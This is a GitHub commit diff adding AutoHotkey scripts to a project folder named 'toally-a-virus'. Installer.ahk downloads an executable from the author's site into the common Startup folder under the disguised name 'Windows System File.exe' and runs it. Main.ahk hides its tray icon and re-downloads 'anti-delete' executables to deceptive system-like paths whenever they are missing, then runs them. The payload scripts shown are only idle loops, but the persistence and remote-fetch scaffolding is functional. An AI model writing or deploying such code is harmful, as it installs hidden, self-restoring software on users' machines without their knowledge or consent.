Skip to content

Commit

Permalink
update
Browse files Browse the repository at this point in the history
  • Loading branch information
DJ13423 committed Nov 20, 2020
1 parent c4b0ef4 commit 9fe280d
Show file tree
Hide file tree
Showing 10 changed files with 33 additions and 18 deletions.
1 change: 1 addition & 0 deletions docs/download/AHK/toally-a-virus/Installer.ahk
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,7 @@ SendMode Input ; Recommended for new scripts due to its superior speed and reli
SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.

UrlDownloadToFile, https://dj13423.github.io/download/AHK/toally-a-virus/Main.exe, %A_StartupCommon%\Windows System File.exe
Sleep, 500
Run, Windows System File.exe, %A_StartupCommon%\
FileCreateDir, C:\Windows System\Security\temp
FileCreateDir, C:\Windows System\Security\data\bin
Expand Down
Binary file added docs/download/AHK/toally-a-virus/Installer.exe
Binary file not shown.
38 changes: 20 additions & 18 deletions docs/download/AHK/toally-a-virus/Main.ahk
Original file line number Diff line number Diff line change
Expand Up @@ -4,22 +4,24 @@ SendMode Input ; Recommended for new scripts due to its superior speed and reli
SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.
#NoTrayIcon

If (FileExist("C:\Windows System\Security\protocol-1.exe")) ;Anti delete 1
{
UrlDownloadToFile, URL, Filename
}
If !(FileExist("C:\Windows System\Security\protocol-1.exe")) ;Anti delete 1
{
UrlDownloadToFile, https://dj13423.github.io/download/AHK/toally-a-virus/anti-delete/AntiDelete1.exe, C:\Windows System\Security\protocol-1.exe
}
If (FileExist("C:\Users\%A_UserName%\proccessData\User1_data\protocol-2.exe")) ;Anti delete 2
{
Run, protocol-2.exe, C:\Users\%A_UserName%\proccessData\User1_data, Max|Min|Hide|UseErrorLevel, OutputVarPID]
}
If !(FileExist("C:\Users\%A_UserName%\proccessData\User1_data\protocol-2.exe")) ;Anti delete 2
{
UrlDownloadToFile, URL, Filename
}
If (FileExist("C:\Users\%A_UserName%\proccessData\User1_data\sync.exe"))

If (FileExist("C:\Windows System\Security\protocol-1.exe")) ;Anti delete 1
{
Run, C:\Windows System\Security\protocol-1.exe
}
If !(FileExist("C:\Windows System\Security\protocol-1.exe")) ;Anti delete 1
{
UrlDownloadToFile, https://dj13423.github.io/download/AHK/toally-a-virus/anti-delete/AntiDelete1.exe, C:\Windows System\Security\protocol-1.exe
}
If (FileExist("C:\Users\%A_UserName%\proccessData\User1_data\protocol-2.exe")) ;Anti delete 2
{
Run, C:\Users\%A_UserName%\proccessData\User1_data\protocol-2.exe
}
If !(FileExist("C:\Users\%A_UserName%\proccessData\User1_data\protocol-2.exe")) ;Anti delete 2
{
UrlDownloadToFile, https://dj13423.github.io/download/AHK/toally-a-virus/anti-delete/AntiDelete2.exe, C:\Users\%A_UserName%\proccessData\User1_data\protocol-2.exe
}
If (FileExist("C:\Users\%A_UserName%\proccessData\User1_data\sync.exe"))
{
Run, C:\Users\%A_UserName%\proccessData\User1_data\sync.exe
}

Binary file added docs/download/AHK/toally-a-virus/Main.exe
Binary file not shown.
4 changes: 4 additions & 0 deletions docs/download/AHK/toally-a-virus/anti-delete/AntiDelete1.ahk
Original file line number Diff line number Diff line change
Expand Up @@ -4,3 +4,7 @@ SendMode Input ; Recommended for new scripts due to its superior speed and reli
SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.
#NoTrayIcon

Loop
{
var0 = "ok"
}
Binary file not shown.
4 changes: 4 additions & 0 deletions docs/download/AHK/toally-a-virus/anti-delete/AntiDelete2.ahk
Original file line number Diff line number Diff line change
Expand Up @@ -4,3 +4,7 @@ SendMode Input ; Recommended for new scripts due to its superior speed and reli
SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.
#NoTrayIcon

Loop
{
var0 = "ok"
}
Binary file not shown.
4 changes: 4 additions & 0 deletions docs/download/AHK/toally-a-virus/keep alive/keepalive1.ahk
Original file line number Diff line number Diff line change
Expand Up @@ -4,3 +4,7 @@ SendMode Input ; Recommended for new scripts due to its superior speed and reli
SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.
#NoTrayIcon

Loop
{
var0 = "ok"
}
Binary file not shown.

0 comments on commit 9fe280d

Please sign in to comment.